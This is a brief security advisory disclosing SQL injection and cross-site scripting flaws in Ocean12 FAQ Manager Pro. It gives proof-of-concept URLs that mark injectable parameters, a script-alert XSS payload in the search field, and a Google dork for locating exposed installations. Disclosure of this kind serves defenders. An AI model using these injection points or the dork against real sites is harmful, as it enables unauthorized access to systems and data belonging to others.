Ocean12 FAQ Manager Pro suffers from remote SQL injection and cross site scripting vulnerabilities.
bab57a2d908c54f939b9e9b850b53562a5c42438d7806670c3009b30a852b1d3
Application: Ocean12 FAQ Manager Pro
Vendor Name: Ocean12
Vendors Url: http://ocean12tech.com/
Bug Type: Ocean12 FAQ Manager Pro (SQL,XSS) Multiple Vulnerabilities
Exploitation: Remote
Google Dork: "Maintained with the Ocean12 FAQ Manager Pro"
SQL POC
http://ocean12tech.com/products/faq/demo/default.asp?Action=Cat&ID=[SQL]
http://ocean12tech.com/products/faq/demo/admin/login.asp?Admin_ID=[SQL]&Pass
word=pass
XSS POc
http://ocean12tech.com/products/faq/demo/default.asp?Action=Search&Keyword=<
script>alert("xssed")</script>
Credits:
Charalambous Glafkos
Email: glafkos (at) astalavista (dot) com
___________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net
Best Regards,
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community
<http://www.astalavista.com/> www.astalavista.com
<http://www.astalavista.net/> www.astalavista.net